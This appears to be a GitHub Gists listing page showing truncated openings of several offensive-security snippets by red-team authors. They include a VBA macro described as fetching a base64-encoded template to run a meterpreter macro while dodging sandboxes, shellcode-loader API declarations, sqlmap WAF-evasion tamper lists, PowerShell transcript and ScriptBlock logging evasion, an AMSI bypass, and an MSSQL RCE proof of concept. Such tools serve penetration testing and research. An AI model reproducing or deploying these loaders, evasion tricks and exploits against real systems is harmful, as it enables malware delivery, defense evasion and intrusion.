SadProcessor
/ B64DataType.ps1
Created
January 5, 2017 22:27
B64 CmdLine Converter - Add to PoSh profile
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## Inline B64CMD Converter (Add to PoSh Profile) | |
| ## via System.String Type Custom ScriptProperty Member | |
| # Base64 Encode/Decode | |
| Update-TypeData -TypeName System.String -MemberName "ToB64" -MemberType scriptproperty -Value {[System.Convert]::ToBase64String([System.Text.Encoding]::UNICODE.GetBytes($this))} | |
| Update-TypeData -TypeName System.String -MemberName "FromB64" -MemberType scriptproperty -Value {[System.Text.Encoding]::UNICODE.GetString([System.Convert]::FromBase64String($this))} | |
| # Add iex | |
| Update-TypeData -TypeName System.String -MemberName "AddIEX" -MemberType scriptproperty -Value {"iex (`"$this`")"} |
Arno0x
/ macro_evade_av_01.vba
Last active
October 12, 2023 23:19
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' Author Arno0x0x - https://twitter.com/Arno0x0x | |
| ' | |
| ' This macro downloads an XML bibliography source file. | |
| ' The <Title> element of this XML file actually contains a base64 encoded MSOffice template | |
| ' which itself contains another malicious macro much more detectable (meterpreter for instance). | |
| ' | |
| ' The base64 encoded file (payload) is extracted from the XML file, decoded and saved on the temporary folder | |
| ' Only then, an new Office Word object is instantiated to load this Office Template and run a specific macro from it. | |
| ' | |
| ' This macro makes use of very basic tricks to evade potential sandbox analysis, such as popup windows, check of local printers |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-NonstandardService { | |
| <# | |
| .SYNOPSIS | |
| Returns services where the associated binaries are either not signed, or are | |
| signed by an issuer not matching 'Microsoft'. | |
| Author: Will Schroeder (@harmj0y) | |
| License: BSD 3-Clause | |
| Required Dependencies: None |
HarmJ0y
/ New-SYSVOLZip.ps1
Created
August 8, 2017 01:03
Compresses all of SYSVOL to a local .zip file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function New-SYSVOLZip { | |
| <# | |
| .SYNOPSIS | |
| Compresses all folders/files in SYSVOL to a .zip file. | |
| Author: Will Schroeder (@harmj0y) | |
| License: BSD 3-Clause | |
| Required Dependencies: None |
Arno0x
/ macro_evade_av.vba
Last active
October 12, 2023 23:19
Load shellcode in macro, from bibliography souce
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #If VBA7 Then | |
| Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Fkfpnhh As Long, ByVal Xref As Long, ByVal Jxnj As LongPtr, Mlgstptp As Long, ByVal Bydro As Long, Rny As Long) As LongPtr | |
| Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Kqkx As Long, ByVal Lxnvzgxp As Long, ByVal Qylxwyeq As Long, ByVal Jpcp As Long) As LongPtr | |
| Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Sreratdzx As LongPtr, ByRef Bzcaonphm As Any, ByVal Vxquo As Long) As LongPtr | |
| #Else | |
| Private Declare Function CreateThread Lib "kernel32" (ByVal Fkfpnhh As Long, ByVal Xref As Long, ByVal Jxnj As Long, Mlgstptp As Long, ByVal Bydro As Long, Rny As Long) As Long | |
| Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Kqkx As Long, ByVal Lxnvzgxp As Long, ByVal Qylxwyeq As Long, ByVal Jpcp As Long) As Long | |
| Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Sreratdzx As Long, ByRef Bzcaonphm As Any, ByVal Vxquo As Long) As Long | |
| #End If |
sapran
/ sqlmap tamper scripts
Last active
May 12, 2024 02:04
sqlmap tamper scripts grouped by DBMS Copied from: https://prakash-khadka.com.np/wp-content/uploads/pdf/www-moonsec-com.pdf
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # All scripts | |
| ``` | |
| --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords | |
| ``` | |
| # General scripts | |
| ``` | |
| --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes | |
| ``` | |
| # Microsoft access | |
| ``` |
benpturner
/ posh.cs
Last active
November 22, 2022 12:00
No Powershell with Transcript Logging Evasion & ScriptBlock Logging Evasion - eventid 4103,4104,4106
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Collections.ObjectModel; | |
| using System.Management.Automation; | |
| using System.Management.Automation.Security; | |
| using System.Management.Automation.Runspaces; | |
| using System.Reflection; | |
| namespace TranscriptBypass | |
| { | |
| // Compiling with CSC.exe v4.0.30319 or v3.5 |
3xocyte
/ create_machine_account.py
Last active
February 21, 2023 03:50
simple script for experimenting with machine account creation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import argparse | |
| import sys | |
| import string | |
| import random | |
| # https://support.microsoft.com/en-au/help/243327/default-limit-to-number-of-workstations-a-user-can-join-to-the-domain | |
| # create machine account utility by @3xocyte | |
| # with thanks to Kevin Robertson for https://github.com/Kevin-Robertson/Powermad/blob/master/Powermad.ps1 |
3xocyte
/ bad_sequel.py
Last active
January 11, 2024 01:42
PoC MSSQL RCE exploit using Resource-Based Constrained Delegation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # for more info: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html | |
| # this is a rough PoC | |
| # requirements for RCE: | |
| # - the attacker needs to either have or create an object with a service principal name | |
| # - the MSSQL server has to be running under the context of System/Network Service/a virtual account | |
| # - the MSSQL server has the WebClient service installed and running (not default on Windows Server hosts) | |
| # - NTLM has to be in use |
TheWover
/ AMSIScanBufferBypass.cs
Last active
October 5, 2021 11:20
Working full program for AMSIScanBufferBypass from Cyber Ark: https://www.cyberark.com/threat-research-blog/amsi-bypass-redux/
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Runtime.InteropServices; | |
| namespace AMSIBypass2 | |
| { | |
| class Program | |
| { | |
| [DllImport("kernel32", SetLastError = true, CharSet = CharSet.Ansi)] | |
| static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)]string lpFileName); |
OlderNewer